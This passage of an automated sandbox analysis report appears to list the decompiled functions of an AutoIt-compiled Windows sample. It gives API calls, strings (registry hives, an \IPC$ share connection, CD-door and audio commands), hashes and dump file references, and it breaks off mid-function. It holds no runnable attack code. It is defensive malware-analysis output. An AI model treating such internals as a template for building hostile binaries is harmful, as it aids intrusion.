mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064A4C5

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

Strings

close cd wait, xrefs: 0064A4B0
wait, xrefs: 0064A482
open , xrefs: 0064A427
type cdaudio alias cd wait, xrefs: 0064A443
closed, xrefs: 0064A3DF, 0064A3E8
set cd door , xrefs: 0064A466
open, xrefs: 0064A3F2
close, xrefs: 0064A3D1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: bfc11dffdb42a18c68bcc0382da744635b0602998b31c00c568ad0c5c4fd1b78
Instruction ID: 43aab25d2887a2db1a35eeb5059480ccb3d8ca4cdedce7f0a7fa3ecae3f9daec
Opcode Fuzzy Hash: bfc11dffdb42a18c68bcc0382da744635b0602998b31c00c568ad0c5c4fd1b78
Instruction Fuzzy Hash: 2E516E711083469FC704EF11C88596EBBE9FF99718F10486DF88A97261DB31EE0ACB42

Function 0063F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0061E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0063F8DF
LoadStringW.USER32(00000000,?,0061E029,00000001), ref: 0063F8E8

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0061E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0063F90A
LoadStringW.USER32(00000000,?,0061E029,00000001), ref: 0063F90D
__swprintf.LIBCMT ref: 0063F95D
__swprintf.LIBCMT ref: 0063F96E
_wprintf.LIBCMT ref: 0063FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0063FA2E

Strings

Line %d (File "%s"):, xrefs: 0063F957
Error: , xrefs: 0063F9E5
Line %d:, xrefs: 0063F968
%s (%d) : ==> %s: %s %s, xrefs: 0063FA12
^ ERROR, xrefs: 0063F9C3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 355c981ee8903d8afc188eb4feebd5f6cd82a777a1f94dd6f2fe53ce5b827ff5
Instruction ID: dd54f7d7265666fcabf40e3aadb830cbd7ac11382c96c41bb0d80e301f314714
Opcode Fuzzy Hash: 355c981ee8903d8afc188eb4feebd5f6cd82a777a1f94dd6f2fe53ce5b827ff5
Instruction Fuzzy Hash: 1A411D72C0415EAACF08FFE1DD4AEEE7B7DAF59340F100065B505A6192EA316F49CBA1

Function 0066BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00669207,?,?), ref: 0066BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00669207,?,?,00000000,?), ref: 0066BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00669207,?,?,00000000,?), ref: 0066BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00669207,?,?,00000000,?), ref: 0066BA85
GlobalLock.KERNEL32(00000000), ref: 0066BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00669207,?,?,00000000,?), ref: 0066BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0066BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00669207,?,?,00000000,?), ref: 0066BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00669207,?,?,00000000,?), ref: 0066BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00672CAC,?), ref: 0066BAD7
GlobalFree.KERNEL32(00000000), ref: 0066BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0066BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0066BB36
DeleteObject.GDI32(00000000), ref: 0066BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0066BB74

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: b4df085a47a1049bc7a0c50cd466a8cf38f5a635c6aaf2470bdc447c6a04fee8
Instruction ID: ccff60ff66f06e239624fce5c60f7260d9fe3c2c98f5ccc55448aac113030258
Opcode Fuzzy Hash: b4df085a47a1049bc7a0c50cd466a8cf38f5a635c6aaf2470bdc447c6a04fee8
Instruction Fuzzy Hash: F2410A75600204FFDB119FA5EC88EAABBBAFF89711F105069F905D7260DB709E41DB60

Function 0064D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0064DA10
_wcscat.LIBCMT ref: 0064DA28
_wcscat.LIBCMT ref: 0064DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0064DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0064DA63
GetFileAttributesW.KERNEL32(?), ref: 0064DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0064DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0064DAA7

Strings

*.*, xrefs: 0064DAE6

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 41fb61d638a812d6b147bd6feab1692591eab2166151961d4ab2d90eb13d67c1
Instruction ID: 5312961d4e01e4673da8de2684c2d2e00cd503514d0cf5f19e322b3b1d8b0c37
Opcode Fuzzy Hash: 41fb61d638a812d6b147bd6feab1692591eab2166151961d4ab2d90eb13d67c1
Instruction Fuzzy Hash: 008182719083419FCB64EF65C844AAAB7EABF89314F18482EF889C7351E730DD45CB52

Function 0066C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0066C1FC
GetFocus.USER32 ref: 0066C20C
GetDlgCtrlID.USER32(00000000), ref: 0066C217
_memset.LIBCMT ref: 0066C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0066C36D
GetMenuItemCount.USER32(?), ref: 0066C38D
GetMenuItemID.USER32(?,00000000), ref: 0066C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0066C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0066C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0066C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0066C489

Strings

0, xrefs: 0066C33A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 38db1bfac8809e1d16c0f9d1493c315cf117a24fd6b5afd3c2c7f76cdbb002c3
Instruction ID: 91adb7918226bdf4ddc678fc08f8e280b067e33a38b2d67480d3c84a63c44e25
Opcode Fuzzy Hash: 38db1bfac8809e1d16c0f9d1493c315cf117a24fd6b5afd3c2c7f76cdbb002c3
Instruction Fuzzy Hash: C0818C70209711AFD710DF15D894ABBBBEAFB88724F00492EF99597391CB70D901CBA2

Function 0065731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0065738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0065739B
CreateCompatibleDC.GDI32(?), ref: 006573A7
SelectObject.GDI32(00000000,?), ref: 006573B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00657408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00657444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00657468
SelectObject.GDI32(00000006,?), ref: 00657470
DeleteObject.GDI32(?), ref: 00657479
DeleteDC.GDI32(00000006), ref: 00657480
ReleaseDC.USER32(00000000,?), ref: 0065748B

Strings

(, xrefs: 00657410

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 9bfd424006dbfcf241df48f4d4377d1e452fbd17bed96b76a45b4660f798169f
Instruction ID: 066fe6c573e9e92bdcc6ba2d76a07456521f1ebfd34eb81b97ff0878e16a114a
Opcode Fuzzy Hash: 9bfd424006dbfcf241df48f4d4377d1e452fbd17bed96b76a45b4660f798169f
Instruction Fuzzy Hash: 44514971904309EFCB14CFA8EC84EAEBBBAEF48310F14842DF95997210C771A944CB60

Function 005E6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00600957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005E6B0C,?,00008000), ref: 00600973

Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005E6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 005E6CFA

Part of subcall function 005E586D: _wcscpy.LIBCMT ref: 005E58A5

Part of subcall function 0060363D: _iswctype.LIBCMT ref: 00603645

Strings

Unterminated string, xrefs: 0061E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 0061E496
AU3!, xrefs: 005E6B61
EA06, xrefs: 0061E452
Bad directive syntax error, xrefs: 0061E79D
Error opening the file, xrefs: 0061E43D, 0061E4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0061E421

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: a45c5b2750f3ec7070e75f3d2d32d17754714149e394089cc9d0bdcb17f9d372
Instruction ID: 8cda451835188c35039dcca5bd22771ffc5cd2d71d52c89d4abca6c6cd26a68e
Opcode Fuzzy Hash: a45c5b2750f3ec7070e75f3d2d32d17754714149e394089cc9d0bdcb17f9d372
Instruction Fuzzy Hash: AC028B301083829FC718EF21C895AAFBBE6BF99354F54481DF4C9972A1DB31D989CB52

Function 00642D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00642D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00642DDD
GetMenuItemCount.USER32(006A5890), ref: 00642E66
DeleteMenu.USER32(006A5890,00000005,00000000,000000F5,?,?), ref: 00642EF6
DeleteMenu.USER32(006A5890,00000004,00000000), ref: 00642EFE
DeleteMenu.USER32(006A5890,00000006,00000000), ref: 00642F06
DeleteMenu.USER32(006A5890,00000003,00000000), ref: 00642F0E
GetMenuItemCount.USER32(006A5890), ref: 00642F16
SetMenuItemInfoW.USER32(006A5890,00000004,00000000,00000030), ref: 00642F4C
GetCursorPos.USER32(?), ref: 00642F56
SetForegroundWindow.USER32(00000000), ref: 00642F5F
TrackPopupMenuEx.USER32(006A5890,00000000,?,00000000,00000000,00000000), ref: 00642F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00642F7E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: d17ac34e9f1177e36463db5b2848cb145d78a2bfd9859b2b59d2c7d072a706d5
Instruction ID: 1c242dd10a78b0e545832894132d4dbf635b4ce10314aeaa267205bf2f2bb7a3
Opcode Fuzzy Hash: d17ac34e9f1177e36463db5b2848cb145d78a2bfd9859b2b59d2c7d072a706d5
Instruction Fuzzy Hash: 7271E570640207BAEB219F54DC69FEABF66FF04314FB00216F615A62E1C7B15C60DBA4

Function 006588AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006588D7
CoInitialize.OLE32(00000000), ref: 00658904
CoUninitialize.OLE32 ref: 0065890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00658A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00658B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00672C0C), ref: 00658B6F
CoGetObject.OLE32(?,00000000,00672C0C,?), ref: 00658B92
SetErrorMode.KERNEL32(00000000), ref: 00658BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00658C25
VariantClear.OLEAUT32(?), ref: 00658C35

Strings

,,g, xrefs: 006588C1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,g
API String ID: 2395222682-619837891
Opcode ID: 20a047ccb10ff83f86c70bef486d5d098d88231a89f5dc6d0a36e82b345b28ba
Instruction ID: 45ff97cfad701b47fc31afddc66dc9a4eff17a8a6b4c220a8b0474a19cdbf712
Opcode Fuzzy Hash: 20a047ccb10ff83f86c70bef486d5d098d88231a89f5dc6d0a36e82b345b28ba
Instruction Fuzzy Hash: 31C138B12083059FD700DF25C88496BBBEAFF89349F00496DF9899B251DB71ED0ACB52

Function 006377DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

_memset.LIBCMT ref: 0063786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006378A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006378BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006378D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00637902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0063792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00637935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063793A

Strings

SOFTWARE\Classes\, xrefs: 0063780C
\IPC$, xrefs: 00637882
\CLSID, xrefs: 00637822

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 490e9ba58d0fdf3a944135fc7c223296410e717945e401c303a9bb347fe890a9
Instruction ID: 024a1aa6402c108e0f9db23634cbe331e0c2e4aaccbc03bdd6204a981e78fbeb
Opcode Fuzzy Hash: 490e9ba58d0fdf3a944135fc7c223296410e717945e401c303a9bb347fe890a9
Instruction Fuzzy Hash: FC412972C1422DAACF25EFA5EC59DEDBB79BF48350F004029F905A72A1EB705D04CB90

Function 00660E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31

Strings

HKEY_CURRENT_USER, xrefs: 00660F10
HKCR, xrefs: 00660ED9
HKLM, xrefs: 00660EAF
HKEY_CURRENT_CONFIG, xrefs: 00660EEE
HKEY_USERS, xrefs: 00660F32
HKU, xrefs: 00660F43
HKEY_LOCAL_MACHINE, xrefs: 00660E9A
HKCU, xrefs: 00660F21
HKCC, xrefs: 00660EFF
HKEY_CLASSES_ROOT, xrefs: 00660EC4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 780ed3d1b548ffa3ae8497dd45fd059756ea253dc5a5ebfa21ba3cb40857b546
Instruction ID: 68f89ee88be6f5f0d1fe8cd058bacdacdc8d730efb7b6ef16baa6b921e7eb4df
Opcode Fuzzy Hash: 780ed3d1b548ffa3ae8497dd45fd059756ea253dc5a5ebfa21ba3cb40857b546
Instruction Fuzzy Hash: 2641C13125038A9BEF15EF15D855AEF3BA6FF15304F140428FC555B692EB30AE1ACBA0

Function 0063F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0061E2A0,00000010,?,Bad directive syntax error,0066F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0063F7C2
LoadStringW.USER32(00000000,?,0061E2A0,00000010), ref: 0063F7C9

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

_wprintf.LIBCMT ref: 0063F7FC
__swprintf.LIBCMT ref: 0063F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0063F88D

Strings

Line %d (File "%s"):, xrefs: 0063F833
Line %d:, xrefs: 0063F818
%s (%d) : ==> %s.: %s %s, xrefs: 0063F7F7
., xrefs: 0063F873
Error: , xrefs: 0063F85B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 2a0e57d8cbcfbab314c4666418036a2c56f5e79408405ce141165839ce012b55
Instruction ID: 15ec05ee49fc62f04401c640be1d01fd1118f6957d1de438c35567ebdbf1f58d
Opcode Fuzzy Hash: 2a0e57d8cbcfbab314c4666418036a2c56f5e79408405ce141165839ce012b55
Instruction Fuzzy Hash: 9E212C3195025EABCF15AF91CC4AEEE7B3ABF18300F040866F515661A2EA719A18DB51

Function 006452C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

Part of subcall function 005E7924: _memmove.LIBCMT ref: 005E79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00645330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00645346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00645357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00645369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0064537A

Strings

alias PlayMe, xrefs: 00645309
play PlayMe, xrefs: 00645375
open , xrefs: 006452DF
play PlayMe wait, xrefs: 00645364
close PlayMe, xrefs: 00645341, 0064536E
status PlayMe mode, xrefs: 0064532B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a1fe00b7384cee693c1d695d59bc09c62f9fbfbc90c44f7b48c429ed8b5c63ee
Instruction ID: bf97627e92a5a8469a3f7d36d42e67f1b98fd4fb38f4dd92fe3891ece3370e47
Opcode Fuzzy Hash: a1fe00b7384cee693c1d695d59bc09c62f9fbfbc90c44f7b48c429ed8b5c63ee
Instruction Fuzzy Hash: BF11513195015E7EDB24BBA2DC49DFF6E7DFBD6B44F100419B446970D2EEA00D05C560

Function 006446B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006446D2
